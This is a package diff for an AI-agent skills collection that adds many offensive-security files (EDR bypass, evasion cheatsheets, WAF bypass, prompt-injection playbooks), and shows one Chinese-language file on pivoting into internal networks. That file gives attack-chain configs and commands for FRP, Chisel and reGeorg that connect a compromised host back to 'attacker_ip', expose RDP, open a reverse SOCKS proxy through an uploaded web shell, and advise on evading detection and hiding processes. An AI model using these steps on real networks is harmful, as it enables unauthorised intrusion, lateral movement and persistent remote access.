opencode-skills-collection 4.0.42 → 4.0.44
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bundled-skills/.antigravity-install-manifest.json +49 -1
- package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
- package/bundled-skills/api-security/SKILL.md +205 -0
- package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
- package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
- package/bundled-skills/apk-reverse/SKILL.md +438 -0
- package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
- package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
- package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
- package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
- package/bundled-skills/attack-chain/SKILL.md +185 -0
- package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
- package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
- package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
- package/bundled-skills/attack-chain/references/phases.md +490 -0
- package/bundled-skills/binary-diff/SKILL.md +320 -0
- package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
- package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
- package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
- package/bundled-skills/case-review/SKILL.md +167 -0
- package/bundled-skills/cloud-k8s/SKILL.md +124 -0
- package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
- package/bundled-skills/code-audit/SKILL.md +92 -0
- package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
- package/bundled-skills/database-security/SKILL.md +81 -0
- package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
- package/bundled-skills/diagram-generator/SKILL.md +199 -0
- package/bundled-skills/diagram-generator/references/README.md +3 -0
- package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
- package/bundled-skills/digital-forensics/SKILL.md +93 -0
- package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
- package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
- package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
- package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
- package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
- package/bundled-skills/docs/sources/sources.md +9 -0
- package/bundled-skills/docs/users/aas-core.md +1 -1
- package/bundled-skills/docs/users/bundles.md +1 -1
- package/bundled-skills/docs/users/claude-code-skills.md +1 -1
- package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
- package/bundled-skills/docs/users/kiro-integration.md +1 -1
- package/bundled-skills/docs/users/usage.md +3 -3
- package/bundled-skills/docs/users/visual-guide.md +4 -4
- package/bundled-skills/docs-generator/SKILL.md +197 -0
- package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
- package/bundled-skills/docs-generator/references/templates.md +102 -0
- package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
- package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
- package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
- package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
- package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
- package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
- package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
- package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
- package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
- package/bundled-skills/email-security/SKILL.md +81 -0
- package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
- package/bundled-skills/firmware-pentest/SKILL.md +381 -0
- package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
- package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
- package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
- package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
- package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
- package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
- package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
- package/bundled-skills/hardware-security/SKILL.md +80 -0
- package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
- package/bundled-skills/ida-reverse/SKILL.md +401 -0
- package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
- package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
- package/bundled-skills/identity-federation/SKILL.md +81 -0
- package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
- package/bundled-skills/instructree/SKILL.md +94 -0
- package/bundled-skills/js-reverse/SKILL.md +239 -0
- package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
- package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
- package/bundled-skills/js-reverse/references/env-patching.md +6 -0
- package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
- package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
- package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
- package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
- package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
- package/bundled-skills/js-reverse/references/output-contract.md +9 -0
- package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
- package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
- package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
- package/bundled-skills/llm-security/SKILL.md +160 -0
- package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
- package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
- package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
- package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
- package/bundled-skills/lore/SKILL.md +104 -298
- package/bundled-skills/lore/references/audit-template.md +21 -4
- package/bundled-skills/lore/references/compatibility.md +51 -121
- package/bundled-skills/lore/references/config.md +22 -23
- package/bundled-skills/lore/references/entry-format.md +33 -3
- package/bundled-skills/lore/references/history-command.md +98 -2
- package/bundled-skills/lore/references/platform-mirrors.md +45 -16
- package/bundled-skills/lore/references/stale-new-markers.md +10 -8
- package/bundled-skills/lore/references/summary-template.md +8 -1
- package/bundled-skills/lore/references/workflows.md +192 -0
- package/bundled-skills/lore/scripts/README.md +14 -13
- package/bundled-skills/lore/scripts/README.zh-CN.md +14 -13
- package/bundled-skills/lore/scripts/find_duplicates.py +14 -4
- package/bundled-skills/lore/scripts/find_stale.py +68 -16
- package/bundled-skills/lore/scripts/history.py +235 -23
- package/bundled-skills/lore/scripts/id_hash.py +7 -4
- package/bundled-skills/lore/scripts/list_entries.py +82 -13
- package/bundled-skills/macos-reverse/SKILL.md +85 -0
- package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
- package/bundled-skills/malware-analysis/SKILL.md +311 -0
- package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
- package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
- package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
- package/bundled-skills/mobile-reverse/SKILL.md +222 -0
- package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
- package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
- package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
- package/bundled-skills/muapi-media/SKILL.md +311 -0
- package/bundled-skills/ot-ics/SKILL.md +117 -0
- package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
- package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
- package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
- package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
- package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
- package/bundled-skills/pentest-tools/SKILL.md +346 -0
- package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
- package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
- package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
- package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
- package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
- package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
- package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
- package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
- package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
- package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
- package/bundled-skills/pentest-tools/references/payloads.md +32 -0
- package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
- package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
- package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
- package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
- package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
- package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
- package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
- package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
- package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
- package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
- package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
- package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
- package/bundled-skills/poka-yoke/SKILL.md +172 -0
- package/bundled-skills/project-state-governor/SKILL.md +1 -1
- package/bundled-skills/project-state-governor/references/project-state-schema.md +1 -1
- package/bundled-skills/protocol-reverse/SKILL.md +108 -0
- package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
- package/bundled-skills/pwn-chain/SKILL.md +209 -0
- package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
- package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
- package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
- package/bundled-skills/radare2/SKILL.md +460 -0
- package/bundled-skills/radare2/references/cheatsheet.md +129 -0
- package/bundled-skills/radio-sdr/SKILL.md +77 -0
- package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
- package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
- package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
- package/bundled-skills/reverse-engineering/SKILL.md +213 -0
- package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
- package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
- package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
- package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
- package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
- package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
- package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
- package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
- package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
- package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
- package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
- package/bundled-skills/reverse-engineering/references/languages.md +499 -0
- package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
- package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
- package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
- package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
- package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
- package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
- package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
- package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
- package/bundled-skills/reverse-engineering/references/tools.md +546 -0
- package/bundled-skills/spec-driven-loop/SKILL.md +203 -0
- package/bundled-skills/spec-driven-loop/references/agent-and-judge-contracts.md +120 -0
- package/bundled-skills/spec-driven-loop/references/document-templates.md +184 -0
- package/bundled-skills/supply-chain-security/SKILL.md +180 -0
- package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
- package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
- package/bundled-skills/thick-client/SKILL.md +104 -0
- package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
- package/bundled-skills/threat-hunting/SKILL.md +94 -0
- package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
- package/bundled-skills/threat-intelligence/SKILL.md +176 -0
- package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
- package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
- package/bundled-skills/wifi-wireless/SKILL.md +80 -0
- package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
- package/bundled-skills/windows-ad/SKILL.md +109 -0
- package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
- package/package.json +1 -1
- package/skills_index.json +1281 -3
- package/bundled-skills/lore/README.md +0 -386
- package/bundled-skills/lore/README.zh-CN.md +0 -386
- package/bundled-skills/lore/WORKFLOWS.md +0 -216
- package/bundled-skills/lore/WORKFLOWS.zh-CN.md +0 -216
|
@@ -0,0 +1,604 @@
|
|
|
1
|
+
# 隧道代理
|
|
2
|
+
|
|
3
|
+
_13 条 intranet payload_
|
|
4
|
+
|
|
5
|
+
### FRP内网穿透 `tunnel-frp`
|
|
6
|
+
_使用FRP建立内网穿透隧道_
|
|
7
|
+
子类:**TCP隧道** · tags: `frp` `tunnel` `proxy` `nat`
|
|
8
|
+
|
|
9
|
+
**前置条件:**
|
|
10
|
+
- 公网服务器
|
|
11
|
+
- 内网机器可访问公网
|
|
12
|
+
- FRP工具
|
|
13
|
+
|
|
14
|
+
**攻击链:**
|
|
15
|
+
|
|
16
|
+
**服务端配置**
|
|
17
|
+
> FRP服务端配置文件frps.ini
|
|
18
|
+
_platform: linux_
|
|
19
|
+
```
|
|
20
|
+
[common]
|
|
21
|
+
bind_port = 7000
|
|
22
|
+
```
|
|
23
|
+
**语法解析:**
|
|
24
|
+
- `bind_port` — 服务端监听端口 _parameter_
|
|
25
|
+
|
|
26
|
+
**客户端配置**
|
|
27
|
+
> FRP客户端配置文件frpc.ini
|
|
28
|
+
_platform: windows_
|
|
29
|
+
```
|
|
30
|
+
[common]
|
|
31
|
+
server_addr = attacker_ip
|
|
32
|
+
server_port = 7000
|
|
33
|
+
|
|
34
|
+
[rdp]
|
|
35
|
+
type = tcp
|
|
36
|
+
local_ip = 127.0.0.1
|
|
37
|
+
local_port = 3389
|
|
38
|
+
remote_port = 3389
|
|
39
|
+
```
|
|
40
|
+
**语法解析:**
|
|
41
|
+
- `server_addr` — 服务端IP _parameter_
|
|
42
|
+
- `local_port` — 本地端口 _parameter_
|
|
43
|
+
- `remote_port` — 远程端口 _parameter_
|
|
44
|
+
|
|
45
|
+
**启动服务端**
|
|
46
|
+
> 启动FRP服务端
|
|
47
|
+
_platform: linux_
|
|
48
|
+
```
|
|
49
|
+
./frps -c frps.ini
|
|
50
|
+
```
|
|
51
|
+
|
|
52
|
+
**启动客户端**
|
|
53
|
+
> 启动FRP客户端
|
|
54
|
+
_platform: windows_
|
|
55
|
+
```
|
|
56
|
+
frpc.exe -c frpc.ini
|
|
57
|
+
```
|
|
58
|
+
|
|
59
|
+
|
|
60
|
+
**分析:** FRP可以建立TCP隧道,将内网服务映射到公网。
|
|
61
|
+
|
|
62
|
+
**OPSEC 提示:**
|
|
63
|
+
- FRP流量可能被检测
|
|
64
|
+
- 考虑使用加密传输
|
|
65
|
+
- 注意隐藏进程
|
|
66
|
+
|
|
67
|
+
**概述:** FRP是一款高性能的反向代理应用,可以将内网服务暴露到公网。
|
|
68
|
+
|
|
69
|
+
**漏洞原理:** 内网机器可以访问公网时,攻击者可以建立隧道将内网服务映射出去。
|
|
70
|
+
|
|
71
|
+
**利用方法:** 利用流程:1) 在公网服务器部署FRP服务端;2) 在内网机器运行FRP客户端;3) 建立隧道连接;4) 通过隧道访问内网服务。
|
|
72
|
+
|
|
73
|
+
**防御措施:** 防御措施:1) 监控异常外联流量;2) 限制出站连接;3) 部署流量分析设备;4) 禁止未授权的代理工具。
|
|
74
|
+
|
|
75
|
+
---
|
|
76
|
+
|
|
77
|
+
### Chisel内网穿透 `tunnel-chisel`
|
|
78
|
+
_使用Chisel建立内网穿透隧道_
|
|
79
|
+
子类:**HTTP隧道** · tags: `chisel` `tunnel` `proxy` `http`
|
|
80
|
+
|
|
81
|
+
**前置条件:**
|
|
82
|
+
- 公网服务器
|
|
83
|
+
- 内网机器可访问公网
|
|
84
|
+
- Chisel工具
|
|
85
|
+
|
|
86
|
+
**攻击链:**
|
|
87
|
+
|
|
88
|
+
**服务端**
|
|
89
|
+
> 启动Chisel服务端
|
|
90
|
+
_platform: linux_
|
|
91
|
+
```
|
|
92
|
+
./chisel server -p 8000 --reverse
|
|
93
|
+
```
|
|
94
|
+
**语法解析:**
|
|
95
|
+
- `chisel server` — Chisel服务端模式 _command_
|
|
96
|
+
- `-p 8000` — 监听端口 _parameter_
|
|
97
|
+
- `--reverse` — 允许反向隧道 _parameter_
|
|
98
|
+
|
|
99
|
+
**反向SOCKS**
|
|
100
|
+
> 建立反向SOCKS代理
|
|
101
|
+
_platform: windows_
|
|
102
|
+
```
|
|
103
|
+
chisel.exe client attacker_ip:8000 R:socks
|
|
104
|
+
```
|
|
105
|
+
|
|
106
|
+
**端口转发**
|
|
107
|
+
> 端口转发
|
|
108
|
+
_platform: windows_
|
|
109
|
+
```
|
|
110
|
+
chisel.exe client attacker_ip:8000 R:3389:127.0.0.1:3389
|
|
111
|
+
```
|
|
112
|
+
|
|
113
|
+
|
|
114
|
+
**分析:** Chisel可以建立HTTP隧道,穿透防火墙。
|
|
115
|
+
|
|
116
|
+
**OPSEC 提示:**
|
|
117
|
+
- Chisel使用HTTP协议
|
|
118
|
+
- 可以绑定域名伪装
|
|
119
|
+
- 流量加密
|
|
120
|
+
|
|
121
|
+
**概述:** Chisel是一款快速的TCP/UDP隧道工具,通过HTTP传输。
|
|
122
|
+
|
|
123
|
+
**漏洞原理:** HTTP隧道可以绕过防火墙限制,将内网服务暴露出去。
|
|
124
|
+
|
|
125
|
+
**利用方法:** 利用流程:1) 在公网服务器运行Chisel服务端;2) 在内网机器运行Chisel客户端;3) 建立隧道;4) 通过代理访问内网。
|
|
126
|
+
|
|
127
|
+
**防御措施:** 防御措施:1) 监控异常HTTP流量;2) 检测长连接;3) 部署流量分析。
|
|
128
|
+
|
|
129
|
+
---
|
|
130
|
+
|
|
131
|
+
### ReGeorg隧道 `tunnel-regeorg`
|
|
132
|
+
_通过Web Shell建立隧道_
|
|
133
|
+
子类:**ReGeorg** · tags: `tunnel` `regeorg` `proxy`
|
|
134
|
+
|
|
135
|
+
**前置条件:**
|
|
136
|
+
- Web Shell上传
|
|
137
|
+
- 支持脚本语言
|
|
138
|
+
|
|
139
|
+
**攻击链:**
|
|
140
|
+
|
|
141
|
+
**上传隧道脚本**
|
|
142
|
+
> 上传对应语言的隧道脚本
|
|
143
|
+
```
|
|
144
|
+
上传tunnel.aspx/tunnel.jsp/tunnel.php到目标Web服务器
|
|
145
|
+
```
|
|
146
|
+
|
|
147
|
+
**建立隧道**
|
|
148
|
+
> 启动SOCKS代理
|
|
149
|
+
_platform: linux_
|
|
150
|
+
```
|
|
151
|
+
python reGeorgSocksProxy.py -p 1080 -u http://target/tunnel.aspx
|
|
152
|
+
```
|
|
153
|
+
**语法解析:**
|
|
154
|
+
- `-p 1080` — 本地监听端口 _parameter_
|
|
155
|
+
- `-u http://target/tunnel.aspx` — 隧道脚本URL _parameter_
